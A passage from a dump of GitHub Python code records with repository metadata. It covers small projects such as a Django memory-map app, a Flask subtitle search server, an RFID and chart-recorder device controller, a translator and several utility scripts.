login_required\nfrom geopy import Nominatim\n\nfrom .forms import AddMemoryForm\nfrom .models import Memory\n\n\ndef login(request: HttpRequest) -> HttpResponse:\n return render(request, 'login.html')\n\n\n@login_required\ndef home(request: HttpRequest) -> HttpResponse:\n m = folium.Map(width=1250, height=750, location=[56.8334, 60.5984])\n memories = Memory.objects.filter(user=request.user)\n if memories:\n for memory in memories:\n geolocator = Nominatim(user_agent='Mozilla/5.0')\n location = geolocator.geocode(memory.location)\n folium.Marker(\n [location.latitude, location.longitude],\n popup=str(memory.title.encode(\"unicode_escape\").decode()),\n icon=folium.Icon(color='blue', icon='info-sign')\n ).add_to(m)\n map = m._repr_html_()\n return render(request, 'home.html', {'memories': memories, 'map': map})\n\n\n@login_required\ndef add_memory(request: HttpRequest) -> HttpResponse:\n if request.method == 'POST':\n form = AddMemoryForm(request.POST)\n if form.is_valid():\n memory = form.save(commit=False)\n memory.user = request.user\n memory.save()\n return redirect('home')\n\n m = folium.Map(width=1250, height=750, location=[56.8334, 60.5984])._repr_html_()\n form = AddMemoryForm()\n return render(request, 'add_memory.html', {'form': form, 'map': m})\n\n\n@login_required\ndef delete_memory(request: HttpRequest, memory_id: int) -> t.Union[HttpResponseRedirect, HttpResponsePermanentRedirect]:\n memory = get_object_or_404(Memory, id=memory_id)\n memory.delete()\n return redirect('home')\n","repo_name":"KonovalovaMarina/Places-Remember","sub_path":"places_remember/memories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4033537595","text":"## Script (Python) \"guard_protocolla\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=state_change\n##title=\n##\nfrom Products.CMFCore.utils import getToolByName\n\ndoc = state_change.object\ndb = doc.getParentDatabase()\n\n#Script personalizzato se esiste\nscriptName=script.id\n\nif scriptName in db.resources.keys():\n return db.resources[scriptName](doc)\n\nif doc.wf_getInfoFor('review_state') == 'avvio':\n return True\nelse:\n isIstruttore = doc.verificaRuolo('iol-reviewer') or doc.verificaRuolo('iol-manager')\n return not doc.getItem('numero_protocollo','') and isIstruttore\n","repo_name":"gisweb/gisweb.iol","sub_path":"src/gisweb/iol/profiles/default/workflows/iol_workflow/scripts/guard_protocolla.py","file_name":"guard_protocolla.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"74124906053","text":"#!/usr/bin/env python3\n\nimport aiger\nimport os\nimport sys\n\nfrom statistics import mean\n\n\ndef scanBenchmarks(inputRoot):\n latchNames = set()\n skipped = []\n stats = []\n for d in os.walk(inputRoot):\n root = d[0]\n for fileName in os.listdir(root):\n if fileName.endswith(\".aag\"):\n fullName = os.path.join(root, fileName)\n try:\n aig = aiger.load(fullName)\n except Exception as err:\n skipped.append(tuple([fullName, err]))\n latches = aig.latches\n stats.append(len(latches))\n latchNames.update([s.lower() for s in latches])\n for (f, e) in skipped:\n print(f\"Warning, skipped benchmark {fullName}\", file=sys.stderr)\n # print(err)\n print(f\"min={min(stats)}, mean={mean(stats)}, max={max(stats)}\")\n return frozenset(latchNames)\n\n\ndef printLatchNames(latchNames, fname):\n out = open(fname, \"w\")\n for latch in latchNames:\n out.write(f\"{latch}\\n\")\n out.close()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Two positional arguments expected: \"\n \"(1) the path to the root of the benchmark directories\"\n \"(2) the full path of the file where you want latch names\",\n file=sys.stderr)\n exit(1)\n else:\n latchNames = scanBenchmarks(sys.argv[1])\n printLatchNames(latchNames, sys.argv[2])\n exit(0)\n","repo_name":"gaperez64/gnns","sub_path":"src/datainfo.py","file_name":"datainfo.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24621100205","text":"import argostranslate.package\r\nimport argostranslate.translate\r\nimport socket\r\nimport os\r\nimport os.path\r\nimport libretranslatepy as lt\r\nfrom langdetect import detect\r\nfrom libretranslatepy import LibreTranslateAPI\r\n\r\n# Idiomas para traducción sin conexión\r\ningles = \"en\"\r\nespañol = \"es\"\r\n# Función para intentar realizar una conexión a internet\r\ndef check_internet():\r\n try:\r\n # Intenta conectar con un host de confianza\r\n socket.create_connection((\"www.google.com\", 80))\r\n \r\n return True\r\n except OSError:\r\n pass\r\n return False\r\n\r\n# Comprobación de conexión\r\nif check_internet():\r\n # Una vez comprobado si hay conexión: si el programa se ejecuta por primera vez tendremos que descargar\r\n # los modelos de traduccion, pero si ya se ha ejecutado no sera necesario\r\n # por lo que realizaremos una comprobación con un archivo de texto\r\n filename = 'ejecutado.txt'\r\n\r\n if not os.path.isfile(filename):\r\n # La descarga se ejecutará solo si el archivo no existe\r\n argostranslate.package.update_package_index()\r\n available_packages = argostranslate.package.get_available_packages()\r\n package_to_install = next(\r\n filter(\r\n lambda x: x.from_code == ingles and x.to_code == español, available_packages\r\n )\r\n )\r\n argostranslate.package.install_from_path(package_to_install.download())\r\n \r\n with open(filename, 'w') as f:\r\n f.write('ejecutado')\r\n \r\n texto = \"Hello World\"\r\n # Detecta el idioma del texto\r\n idioma_origen = detect(texto)\r\n # Traduce el texto a español \r\n traductor = LibreTranslateAPI('https://libretranslate.org/')\r\n texto_traducido = traductor.translate(texto, idioma_origen, español)\r\n print(f\"Texto traducido con conexion: {texto_traducido}\")\r\n # '¡Hola Mundo!' \r\nelse:\r\n # Si no se cuenta con conexion se hace uso de argos para la traducción\r\n texto = \"Hello World\"\r\n # Detecta el idioma del texto\r\n idioma_origen = detect(texto)\r\n # Si el idioma detectado correspone a los modelos descargados, se realizara la traducción\r\n if idioma_origen == ingles:\r\n translatedText = argostranslate.translate.translate(texto, ingles, español)\r\n print(f\"Texto traducido sin conexion: {translatedText}\")\r\n # '¡Hola Mundo!'\r\n else:\r\n print(\"No se cuenta con ese idioma para traduccion offline\") \r\n\r\n\r\n\r\n","repo_name":"AngelAlanis/ai-aztech","sub_path":"traductorOn-Off.py","file_name":"traductorOn-Off.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75138462213","text":"def main():\n i = 0\n while True:\n # input\n num = int(input())\n i += 1\n\n # output\n if num != 0:\n ans = 'Case ' + str(i) + ': ' + str(num)\n print(ans)\n else:\n exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fumiyanll23/aoj","sub_path":"ITP1/3/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72318435653","text":"from flask import Flask, g, request, jsonify\nimport sqlite3\nimport pexpect\nimport word_processing\nimport math\nfrom gensim.models.doc2vec import Doc2Vec\n\nDATABASE = 'subtitles.db'\n\nindex = pexpect.spawn('./search')\ncolumn_len = len(open('data/documents.txt', 'r').read().splitlines())\ndocument_freq = {j.split(\"\\t\")[0] : int(j.split(\"\\t\")[1]) for j in open('data/document_freq.txt', 'r').read().splitlines()}\nmax_freq = {j.split(\"\\t\")[0] : int(j.split(\"\\t\")[1]) for j in open('data/max_freq.txt', 'r').read().splitlines()}\n\ndef search(query):\n counts = word_processing.GetCounts(query)\n args = \"\"\n for term, freq in counts.items():\n if term in max_freq:\n weight = (int(freq)/max_freq[term])*math.log2(column_len/document_freq[term])\n args += f\"{term} {weight} \"\n if args == \"\":\n return []\n index.sendline(args)\n index.expect(\"\\n\", timeout=None); index.expect(\"\\n\")\n return list(map(int, str(index.before)[2:-3].strip().split(\" \")))\n\n\ni2documents = { i : int(j) for i, j in enumerate(open('data/documents.txt', 'r').read().splitlines()) }\ndoc2vec_model = Doc2Vec.load(\"models/doc2vec.model\")\n\ndef doc2vecSearch(query):\n vec = doc2vec_model.infer_vector(word_processing.Tokenize(query, True))\n res = doc2vec_model.dv.most_similar([vec], topn=50)\n return [i2documents[i] for i, _ in res]\n\napp = Flask(__name__)\n\ndef make_dicts(cursor, row):\n return dict((cursor.description[idx][0], value) for idx, value in enumerate(row))\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n db.row_factory = make_dicts\n return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n@app.route(\"/\")\ndef hello_world():\n return open('index.html').read()\n\n@app.route(\"/movies\")\ndef Movies():\n query = request.args.get('query')\n doc2vec = request.args.get('doc2vec')\n if query == \"\" or query == None:\n return \"[]\"\n\n if doc2vec == \"true\":\n ids = doc2vecSearch(query)\n else:\n ids = search(query)\n \n if ids == []:\n return \"[]\"\n \n i_ids = {j:i for i, j in enumerate(ids)}\n movies = get_db().execute('SELECT * FROM OpenSubtitles WHERE IDSubtitle IN '+str(tuple(ids))).fetchall()\n movies = sorted(list(movies), key=lambda x: i_ids[x['IDSubtitle']])\n return jsonify(movies)\n\napp.run()","repo_name":"uel/MovieSearch","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20186578884","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\n\nclass Scaling:\n def scaling(self, x_training, x_testing, method):\n # print(\"Scaling training and test set features\")\n\n if method == \"zscore\" or method == \"default\":\n # Feature Scaling - Z-Score Normalization\n scaler = StandardScaler()\n\n x_training = scaler.fit_transform(x_training)\n x_testing = scaler.transform(x_testing)\n\n else:\n # Feature Scaling - Min-Max Scaling\n scaler = MinMaxScaler()\n\n x_training = scaler.fit_transform(x_training)\n x_testing = scaler.transform(x_testing)\n\n return scaler, x_training, x_testing\n","repo_name":"CicaMatt/Sentry","sub_path":"components/feature_scaling.py","file_name":"feature_scaling.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36941488587","text":"import serial\nimport os\nimport subprocess\nfrom time import sleep, time\nimport threading\nfrom evdev import InputDevice\nfrom select import select\n\n# local imports\nfrom common import *\n\n# Constants\n#\nUSB_PORT_PREFIX = \"/dev/ttyUSB\"\nMAX_USB_PORTS = 12\nRFID_SEND_COUNT = 3\nRFID_LENGTH = 29\nMAX_RETRIES = 20\nRETRY_DELAY = 0.5\nSERIAL_TIMEOUT = 0.5\n\n# communication protocols\nREQ_ID = \"id\"\nREQ_START = \"start\"\nREQ_STOP = \"stop\"\nRSP_ACK = \"OK\"\nREQ_HANDSHAKE = \"hello?\"\nRSP_HANDSHAKE = \"hello!\"\n\n# id's\nID_RFID = \"id:rfid\"\nID_CHART = \"id:chart\"\n\nscancodes = {\n # Scancode: ASCIICode\n 0: None, 1: u'ESC', 2: u'1', 3: u'2', 4: u'3', 5: u'4', 6: u'5', 7: u'6', 8: u'7', 9: u'8',\n 10: u'9', 11: u'0', 12: u'-', 13: u'=', 14: u'BKSP', 15: u'TAB', 16: u'q', 17: u'w', 18: u'e', 19: u'r',\n 20: u't', 21: u'y', 22: u'u', 23: u'i', 24: u'o', 25: u'p', 26: u'[', 27: u']', 28: u'CRLF', 29: u'LCTRL',\n 30: u'a', 31: u's', 32: u'd', 33: u'f', 34: u'g', 35: u'h', 36: u'j', 37: u'k', 38: u'l', 39: u';',\n 40: u'\"', 41: u'`', 42: u'LSHFT', 43: u'\\\\', 44: u'z', 45: u'x', 46: u'c', 47: u'v', 48: u'b', 49: u'n',\n 50: u'm', 51: u',', 52: u'.', 53: u'/', 54: u'RSHFT', 56: u'LALT', 57: u' ', 100: u'RALT'\n}\n\n#\n# Globals\n#\n\n# serial device handles\ndevices = {'rfid': {'key': 'rfid',\n 'name': 'RFID Reader',\n 'id': 'id:rfid',\n 'fault': 'critical',\n 'status': 'init',\n 'port': '/dev/input/by-id/usb-Sycreader_RFID_Technology_Co.__Ltd_SYC_ID_IC_USB_Reader_08FF20140315-event-kbd',\n 'port-status': 'fixed',\n 'sort': 1\n },\n 'chart1': {'key': 'chart1',\n 'name': 'Chart Recorder 1',\n 'id': 'id:chart',\n 'fault': 'warn',\n 'status': 'init',\n 'port': '',\n 'port-status': 'variable',\n 'sort': 2\n },\n 'chart2': {'key': 'chart2',\n 'name': 'Chart Recorder 2',\n 'id': 'id:chart',\n 'fault': 'silent',\n 'status': 'init',\n 'port': '',\n 'port-status': 'variable',\n 'sort': 3\n }\n }\n\nassigned_ports = []\n\n# a place to store our rfid as we receive it\nrfid_in = \"\"\n\n# timers\nchart_timer = \"\"\n\n\n#\n# Device locating and setup\n#\n\ndef sorted_devices():\n \"\"\"Return list of devices sorted by sort order values in devices dictionary\"\"\"\n return sorted(devices.values(), key=lambda x: x['sort'])\n\n\ndef is_port_active(port):\n \"\"\"Check if given port is active.\n Note if no part is passed, it returns False\"\"\"\n if (port):\n # report(\"Checking if %s is active:\" % (port))\n # we use a system call to see if this serial handle exists\n return os.path.exists(port)\n\n\ndef get_active_usb_ports():\n \"\"\"Search usb ports and find out which ones are active, returning a list\"\"\"\n usb_list = []\n # we look for up to max_ports usb ports\n for port_num in range(MAX_USB_PORTS):\n usb_port = USB_PORT_PREFIX + str(port_num)\n if is_port_active(usb_port):\n usb_list.append(usb_port)\n return usb_list\n\n\ndef request_id_from_device(port):\n \"\"\"Send an ID request to a serial port and return the ID we get\"\"\"\n # we only want to check port if it is still active\n if (is_port_active(port)):\n # set up a serial port temporarily\n ser = serial.Serial(port, 9600, timeout=SERIAL_TIMEOUT)\n # clear the buffers - TODO: Does this actually do it?\n ser.reset_input_buffer()\n ser.reset_output_buffer()\n # we ask several times until we get an answer\n for i in range(MAX_RETRIES):\n ser.write(REQ_ID)\n sleep(RETRY_DELAY)\n waiting = ser.inWaiting()\n response = ser.readline().strip()\n # report(\"Serial Try\", i, \"=\", response, \"waiting:\", waiting)\n if response:\n break\n sleep(RETRY_DELAY)\n return response\n # otherwise return empty string\n return \"\"\n\n\ndef setup_devices():\n \"\"\"Set up all of our serial ports connected to our devices\"\"\"\n # report(\"Checking for active ports\")\n try:\n usb_ports = get_active_usb_ports()\n # First we assign all of our fixed port devices\n for device in sorted_devices():\n if (device['port-status'] == 'fixed' and device['status'] != 'live') and \\\n is_port_active(device['port']):\n debug(\"Unassigned device:\", device['name'])\n report(\"Setting up %s, ID: %s, Port: %s\" % (device['name'],\n device['id'], device['port']))\n # asign a handle\n device['handle'] = InputDevice(device['port'])\n # add port to our assigned port list\n if device['port'] not in assigned_ports:\n assigned_ports.append(device['port'])\n # mark is as currently live\n device['status'] = 'live'\n # Now we assign all of our variable port devices\n for port in usb_ports:\n debug(\"Active ports:\", str(usb_ports), level=3)\n debug(\"Registered ports:\", str(assigned_ports), level=3)\n # if this port isn't already assigned\n if (port not in assigned_ports):\n debug(\"Unassigned port:\", port)\n #\n # look through our list of expected devices\n for device in sorted_devices():\n # if the device is not fixed port and not already live\n if (device['port-status'] != 'fixed' and not is_port_active(device['port'])):\n debug(\"Unassigned device:\", device['name'])\n # if device IDs as this device\n response = request_id_from_device(port)\n debug(\"Response: \", response)\n if (device['id'] in response):\n report(\"Setting up %s, ID: %s, Port: %s\" % (device['name'],\n response, port))\n # asign a serial handle\n device['handle'] = serial.Serial(port, 9600, timeout=.5)\n # assign the port name\n device['port'] = port\n # add port to our assigned port list\n if port not in assigned_ports:\n assigned_ports.append(port)\n # mark is as currently live\n device['status'] = 'live'\n # we don't need to look through the rest of the\n # devices\n break\n # we continue looking through the active ports\n except IOError:\n report(\"WARNING: Setup error, retrying\")\n sleep(1)\n setup_devices()\n\n\ndef all_devices_live():\n \"\"\"Check if each device handle is still valid.\n Note that a fault with some critical devices will pause\n any further action, while others just generate a warning.\n Still other devices are optional and will just silently fail.\"\"\"\n devices_ok = True\n # we iterate over the list of possible devices\n for device in sorted_devices():\n # check if port is active. Note if we lost the port previously and it is empty\n # is_port_active() returns False\n if not is_port_active(device['port']):\n # devices['chart']['live'] = False\n if (device['fault'] == 'critical'):\n # at intervals we report this\n update(\"CRITICAL: %s disconnected.\" % device['name'])\n elif (device['fault'] == 'warn'):\n # at intervals we report this\n update(\"WARNING: %s disconnected.\" % device['name'])\n # set status for this device\n device['status'] == 'missing'\n # unassign port\n if device['port-status'] != \"fixed\":\n device['port'] == ''\n # remove port from our assigned port list\n if device['port'] in assigned_ports:\n assigned_ports.remove(device['port'])\n devices_ok = False\n return devices_ok\n\n\ndef all_critical_devices_live():\n \"\"\"Quick check if critical devices are live relies on side effects of check_if_all_devices_live()\"\"\"\n critical_ok = True\n for device in sorted_devices():\n if device['fault'] == 'critical' and device['status'] != 'live':\n critical_ok = False\n break\n return critical_ok\n\n#\n# device communication\n#\n\n\ndef tell_device(device, text):\n ser = devices[device]['handle']\n try:\n ser.reset_input_buffer()\n ser.reset_output_buffer()\n ser.write(text)\n sleep(RETRY_DELAY)\n response = ser.readline().strip()\n except:\n response = None\n return response\n # for i in range(MAX_RETRIES):\n # ser.write(text)\n # sleep(RETRY_DELAY)\n # try:\n # waiting = ser.inWaiting()\n # response = ser.readline().strip()\n # except:\n # pass\n # # report(\"Serial Try\", i, \"=\", response, \"waiting:\", waiting)\n # if response in locals() and RSP_ACK in response:\n # return response\n # sleep(RETRY_DELAY)\n\n\n#\n# Outside world actions & communication\n#\n\ndef display_found_object(data):\n title = data[\"title\"]\n category = data[\"category\"]\n url = youtube_url + data[\"video\"] + youtube_post\n report(\"This is a\", title)\n report(\"Showing video\", url)\n # browser.get(url)\n\n\ndef start_chart(time):\n \"\"\"Start chart recorders and set callback timer to turn it off\"\"\"\n global chart_timer\n # first we cancel any timer we've set before\n if (chart_timer):\n chart_timer.cancel()\n report(\"Canceling old timer\")\n # tell every connected chart recorder to start\n for device in sorted_devices():\n if 'chart' in device['key'] and is_port_active(device['port']):\n results = tell_device(device['key'], REQ_START)\n report(\"Starting %s. It responds: %s\" % (device['name'], results))\n chart_timer = threading.Timer(time, stop_chart).start()\n\n\ndef stop_chart():\n \"\"\"Stops chart recorders\"\"\"\n for device in sorted_devices():\n if 'chart' in device['key'] and is_port_active(device['port']):\n results = tell_device(device['key'], REQ_STOP)\n report(\"Stopping %s. It responds: %s\" % (device['name'], results))\n\n\ndef listen_and_report():\n \"\"\"Do our main loop actions, particularly listening to the\n RFID reader and triggering actions\"\"\"\n global rfid_in\n result = None \n rfid_good = None \n try:\n update(\"Listening for RFID\")\n rfid_device = devices['rfid']['handle']\n r,w,x = select([rfid_device], [], [])\n for event in rfid_device.read():\n if event.type == 1 and event.value == 1:\n key = scancodes[event.code]\n if key != 'CRLF':\n if key.isdigit():\n rfid_in += \"%02d:\" % int(key)\n debug(\"Key: %s ID: %s\" % (key, rfid_in), level=2)\n else:\n rfid_in = rfid_in[0:-1]\n debug(\"Full id received: %s\" % (rfid_in))\n # if the rfid has the proper length,\n # we can trust it\n if len(rfid_in) == RFID_LENGTH:\n rfid_good = rfid_in\n report(\" Received good RFID:\", rfid_in)\n else:\n report(\" Received bad RFID:\", rfid_in)\n rfid_in = \"\"\n if rfid_good:\n report(\"RFID found:\", rfid_good)\n # clear incoming buffer in case we have stuff waiting\n # rfid_device.reset_input_buffer()\n # rfid_device.flushInput()\n #report(\"Continue listening for RFID\")\n # # do we have data on the input buffer waiting\n # if rfid_device.in_waiting > 0:\n # # if we send the same rfid multiple times\n # # in theory they should all be the same,\n # # but in practice we are sometimes missing bytes.\n # # Thus we send it multiple times to guard against data loss\n # rfid_good = \"\"\n # count = 0\n # # we keep looking if we have something waiting\n # # AND we haven't exceeded our count\n # # AND we haven't already rec'd a good rfid\n # while (rfid_device.in_waiting > 0 and count < RFID_SEND_COUNT and\n # not rfid_good):\n # rfid_in = rfid_device.readline().strip()\n # # if the rfid has the proper length,\n # # we can trust it\n # if len(rfid_in) == RFID_LENGTH:\n # rfid_good = rfid_in\n # report(\" Received good RFID:\", rfid_in)\n # else:\n # report(\" Received bad RFID:\", rfid_in)\n # if rfid_good:\n # report(\"RFID found:\", rfid_good)\n # result = get_rfid_data(rfid_good)\n # # clear incoming buffer in case we have stuff waiting\n # rfid_device.reset_input_buffer()\n # rfid_device.flushInput()\n # report(\"Continue listening for RFID\")\n except IOError:\n update(\"WARNING: Lost RFID device\")\n return(rfid_good)\n\n\ndef main():\n setup_devices()\n # This is our main loop that listens and responds\n while 1:\n # check if all of our devices are active\n if not all_devices_live():\n setup_devices()\n # let's take actions if we can\n if all_critical_devices_live():\n listen_and_report()\n\n\nif __name__ == '__main__':\n try:\n # Enter the main loop\n main()\n except KeyboardInterrupt:\n report(\"\")\n report(\"Exiting.\")\n # except Exception as e:\n # print \"\"\n # print str(e)\n # except:\n","repo_name":"wmodes/auratic","sub_path":"master/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":14412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35098650286","text":"import json\nimport os\nfrom matplotlib import pyplot as plt\nfrom collections import OrderedDict\n\nresults_list = []\nroot = \"outputs/\"\n\nfor root, dir, files in os.walk(root):\n for dirname in sorted(dir):\n f_root = root + dirname + \"/\" + \"training_data.json\"\n with open(f_root, \"rb\") as f:\n data = json.load(f) \n results_list.append((dirname, data))\n \nresults_dicts = OrderedDict(results_list)\n\nfigure = plt.figure(figsize=(1,1))\nrows = 1\ncolumns = 1\nh = 50\nw = 50\ncount = 1\nfor key, val in results_dicts.items():\n \n epochs = list(range(1, len(val[\"train_loss\"])+1))\n \n ax = figure.add_subplot(rows, columns, count)\n count += 1\n ax.plot(epochs, val[\"train_loss\"], label = \"training_total\", color = \"#0000FF\")\n ax.plot(epochs, val[\"val_loss\"], label = \"val_total\", color = \"#EE4B2B\")\n ax.scatter(val[\"best_epoch\"][-1]+1, val[\"best_loss\"][-1], c = \"g\", marker = \"o\")\n\n ax.set_xlabel(\"Number of Epochs\")\n ax.set_ylabel(\"Loss Value\")\n\n plt.title(key)\n best_label = str(round(val[\"best_loss\"][-1], 3)) + \" @ \" + str(val[\"best_epoch\"][-1])\n plt.annotate(best_label, (val[\"best_epoch\"][-1], val[\"best_loss\"][-1]))\n #step_label = str(round(val[\"step_mAP\"][0], 3)) + \" @ \" + str(val[\"step_epoch\"][0])\n #plt.annotate(step_label, (val[\"step_epoch\"][0], val[\"step_mAP\"][0]))\n\nfigure.legend(loc=\"upper right\")\nplt.show()","repo_name":"14472506/self_supervised_vision","sub_path":"Archive/data_plotting.py","file_name":"data_plotting.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37303266598","text":"from . import fac_to_itin\n\ndef find_one(n, fac_perm, iter, distance_min, memo, xys, inter_town_distances):\n d_iter = round(fac_perm * 0.05)\n\n \"\"\" Below are descriptions of the lines. All positions are expressed in half-feet, relative to an origin at the middle of the baseline. All lines point in positive direction (either x or y).\n 0: left-outside alley\n 1: left-inside alley\n 2: back of service line\n 3: bisector of service boxes\n 4: baseline\n 5: right-inside alley\n 6: right-outside alley\n \"\"\"\n\n dx1 = 27\n dx2 = 36\n dy1 = 36\n dy2 = 78\n\n xy = (((-dx2, 0),(-dx2,dy2)), \\\n ((-dx1, 0),(-dx1,dy2)), \\\n ((-dx1,dy1),( dx1,dy1)), \\\n (( 0,dy1),( 0,dy2)), \\\n ((-dx2, 0),( dx2, 0)), \\\n (( dx1, 0),( dx1,dy2)), \\\n (( dx2, 0),( dx2,dy2)))\n\n # loop over all permutations (ie, all possible itineraries)\n while iter < fac_perm:\n # salesperson starts at origin, which n-th point (0-based indexing) is defined to be.\n index_last = n\n distance_tot = 0\n # let dIter = Math.round(facPerm/1000)\n itin = fac_to_itin.fac_to_itin(n, iter)\n # flag used to determine whether or not memo can be used\n are_same = True\n for i in range(len(itin)):\n index = itin[i]\n are_same = are_same and memo and len(memo) > i and memo[i][0] == index\n # ... if existing element in memo cannot be used, then reassign it\n if not are_same:\n pair = [index, distance_tot + inter_town_distances[index_last][index]]\n if len(memo) > i:\n memo[i] = pair\n else:\n memo.append(pair)\n distance_tot = memo[i][1]\n index_last = index\n # salesperson ends at the origin, which is n-th point.\n distance_tot += inter_town_distances[index_last][n]\n itin.insert(0, n)\n itin.append(n)\n # Return if you find the next minimum of the search.\n if distance_tot < distance_min:\n return {\"iter\": iter, \"itin\": itin, \"distance_min\": distance_tot, \"memo\": memo, \"finished\": False}\n # Return to provide an update on progress (the next 5%).\n if not iter % d_iter:\n return {\"iter\": iter, \"finished\": False}\n iter += 1\n return {\"finished\": True}\n","repo_name":"pknipp/line_sweeping_back","sub_path":"line_sweeping/find_one.py","file_name":"find_one.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17368938211","text":"import pytest\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef deposited(compound, USDC):\n to_deposit_usdc = 100_000 * 10 ** USDC.decimals()\n compound.deposit(USDC, to_deposit_usdc)\n\n to_deposit_eth = 10 ** 18\n compound.deposit_eth(to_deposit_eth)\n\n\ndef test_withdraw(safe, compound, USDC, cUSDC):\n\n before_bal_usdc = USDC.balanceOf(safe)\n before_bal_cUSDC = cUSDC.balanceOf(safe)\n to_withdraw = 100_000 * 10 ** USDC.decimals()\n\n compound.withdraw(USDC, to_withdraw)\n\n assert USDC.balanceOf(safe) == before_bal_usdc + to_withdraw\n # Can be more precise by calculating Ctokens exchange rates\n assert cUSDC.balanceOf(safe) < before_bal_cUSDC\n\n\ndef test_withdraw_eth(safe, compound, cETH):\n\n before_bal_eth = safe.account.balance()\n before_bal_ceth = cETH.balanceOf(safe)\n\n to_withdraw = 10 ** 18\n\n compound.withdraw_eth(to_withdraw)\n\n assert safe.account.balance() == before_bal_eth + to_withdraw\n assert cETH.balanceOf(safe) < before_bal_ceth\n\n\ndef test_withdraw_ctoken(safe, compound, USDC, cUSDC):\n before_bal_usdc = USDC.balanceOf(safe)\n\n to_withdraw = cUSDC.balanceOf(safe)\n\n compound.withdraw_ctoken(cUSDC, to_withdraw)\n\n assert USDC.balanceOf(safe) > before_bal_usdc\n assert cUSDC.balanceOf(safe) == 0\n","repo_name":"Badger-Finance/badger-multisig","sub_path":"tests/compound/test_compound_withdraw.py","file_name":"test_compound_withdraw.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"44"} +{"seq_id":"33059635578","text":"from django.urls import path\nfrom .views import authenticate_user, UserRetrieveUpdateAPIView, RoleAPIView, UserAPIView, Current_User\n\n\nurlpatterns = [\n path('auth', authenticate_user),\n path('current_user/', Current_User),\n path('role/', RoleAPIView.as_view()),\n path('role//', RoleAPIView.as_view()),\n path('userm/', UserAPIView.as_view()),\n path('userm//', UserAPIView.as_view()),\n\n]\n","repo_name":"rahulkranjan/thaatee_learning","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32762447243","text":"import tkinter as tk\nimport tkinter.messagebox as mb\n\nroot = tk.Tk()\nroot.title(\"Height calculator tool\")\nroot.grid()\n\nspace1 = tk.Label(root).grid(row=0,column=0)\nspace2 = tk.Label(root).grid(row=2, column=0)\n\nlabel1 = tk.Label(root, text=\"Input your height \").grid(row=1,column=0)\nentry = tk.Entry(root); entry.grid(row=1, column=1)\nlabel2 = tk.Label(root, text=\"cm\").grid(row=1,column=2)\n\ndef solve():\n global entry\n mb.showinfo(\"Result\", f\"Your height is {entry.get()} cm!\")\n \nbutton = tk.Button(root, text=\"Solve\", command=solve).grid(row=3, column=2)\n\nroot.mainloop()","repo_name":"Fabetsol/Bonjour-nous-sommes-vendredi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12578077974","text":"import re\nimport os\n\nabs_file_path = os.path.abspath(\"../output_files/outfile_inter.txt\");\n#abspath = os.getcwd()\n#print(abspath)\n#print(__file__)\ntext_file = open(abs_file_path,\"r\");\ntext_file = text_file.readlines();\ntext_file = ' '.join(text_file)\n\nacronym_list = set([x.group() for x in re.finditer(r'\\b[A-Z](?=([&.]?))(?:\\1[A-Z]){1,5}\\b', text_file)])\n\nprint(acronym_list)","repo_name":"Shilpa39/Py_Acronym_processing","sub_path":"source_files/text_to_acronyms.py","file_name":"text_to_acronyms.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22050724506","text":"source_url = \"https://towardsdatascience.com/google-foobar-challenge-level-2-7a021f625c1\"\n\n\nimport re\ndef solution(s):\n no_dash = re.sub('-', '', s)\n\n # find number of salutes for walkers going right\n answer = 0\n for ind, direction in enumerate(no_dash):\n if direction == '>':\n people_in_front = no_dash[ind:]\n left_walkers = people_in_front.count('<')\n\n answer += left_walkers * 2\n\n return answer\n","repo_name":"1969-07-20/GoogleFoobarChallenge","sub_path":"OfflineTester/Level2_EnRouteSalute/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5170998796","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef unpickle(file):\n 